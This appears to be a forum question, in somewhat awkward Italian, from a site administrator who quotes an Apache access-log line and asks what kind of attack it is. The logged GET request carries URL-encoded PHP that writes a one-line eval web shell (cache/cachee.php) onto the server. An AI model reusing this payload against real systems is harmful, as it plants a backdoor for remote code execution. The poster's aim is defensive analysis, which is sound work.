Oggi abbiamo ricevuto la seguente richiesta nel file dei registri di accesso di Apache.
"GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7C%3C-'; HTTP/1.1" 200 42303
Come visto chiaramente dall'URL della richiesta di cui sopra, l'hacker sta tentando di tentare POST i dati o il file tramite la richiesta GET e sorprendentemente ha ottenuto 200 Status Code in stato di risposta.
Che tipo di tentativo di hacking è?
Nota: - Per motivi di sicurezza, abbiamo bloccato tutte le richieste POST tranne alcuni URL di moduli sul nostro server.
Quindi qualsiasi hacker che sta tentando di pubblicare alcuni dati dannosi sul nostro server riceverà 403 codice di stato in risposta
sopra l'hacker POSTED Alcuni dati tramite GET Request e lui ha 200 Status Code in Response.
Per favore aiutami a sapere quale tipo di tecnica di hacking è questa?